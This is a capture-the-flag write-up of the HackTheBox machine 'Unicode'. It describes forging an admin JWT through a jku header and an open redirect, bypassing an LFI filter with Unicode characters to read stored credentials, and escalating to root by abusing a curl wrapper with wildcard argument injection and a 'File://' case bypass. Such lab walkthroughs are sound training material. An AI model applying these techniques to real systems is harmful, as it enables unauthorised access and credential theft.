Unicode - [HTB]

Cover Image for Unicode - [HTB]
Marmeus
Marmeus

Introduction

Unicode is a medium Linux machine from HackTheBox where the attacker will have to find a way to use a redirect web page in order to modify a JWT gaining access to a dashboard as admin. Later, it will have to exploit an LFI vulnerability using Unicode characters to bypass the filter obtaining some credentials. Finally, it will have to exploit a wildcard vulnerability on a custom script that can be executed as root.

Enumeration

As always, let's start finding all opened ports in the machine with Nmap.

Then, we continue with a deeper scan of every opened port, getting more information about each service.

Looking at port 80 there is a web page where we can register an account.

Hackmedia

We can see clicking a "Google about us" button that redirects us to google.com through an internal redirect page that requires the url parameter.

Furthermore, once registered we can access the hackmedia dashboard.

Hackmedia dashboard

Analyzing the cookies we can verify that the platform uses JWT that can decode using jwt.io.

Hackmedia JWT decoded

As we can see it uses RSA256 and jku in order to verify the signature of the token. Plus, inside the jku link we can find the public key for the signature verification.

Exploitation 1

Looking for ways to exploit the jku there is a post about how to hack JWT Tokens with jku. What we are going to do is to create our own jwt token changing the user as "admin". For doing so, we need to create a pair of public and private keys for jku with mjwk.

jku generator

However, the jku link has some kind of filtering so we need to keep the base URL http://hackmedia.htb/static/. Hence, we need to use the redirect function pointing to our web server.

Finally, the jwt token and the jwks.json should look like this.

JWT Modified

Exploitation 2

Once modified our token we should have access to the admin dashboard where we can access the "Saved reports" section.

Admin dashboard

Inspecting the URL we can see that maybe is vulnerable to LFI.

Nonetheless, if we try the following path traversal bypass technique we obtain the following output.

Because the machine is named "Unicode" maybe we can pass this filter using Unicode characters. In this post, we can learn how to do it.

The url encoded version looks like this.

Now, looking for the nginx default configuration there is a hint for a file with some stored credentials.

These credentials can be obtained through this link.

Finally, we can gain access to the machine as code with the database creds.

Privilege Escalation

The user code can execute the file /usr/bin/treport as root.

This binary uses the curl command to retrieve online reports using a URL as a parameter. This means that we can pass the wildcard ("*") so every file in the current directory can be interpreted as a parameter on the curl command. Furthermore, there is some kind of filtering because we can not use file:///root/root.txt.

In order to bypass the filter, we can use File:///root/root.txt, obtaining a new error where some directories must exist in order to store the report. So, here is where the wildcard takes part.

The curl command has the --create-dirs parameter which creates all directories needed in order to store a file. Hence, if we create the files"--create-dirs" and "127.0.0.1" the command will be executed correctly allowing us to retrieve the root flag.

These are the steps you should follow.

Note: This is the unintended way to solve the machine, so maybe this vulnerability is fixed once the machine is retired. The intended way is passing a python dictionary with the parameters {-K,/root/root.txt} for the URL command so it loads the flag as a configuration file for the curl command.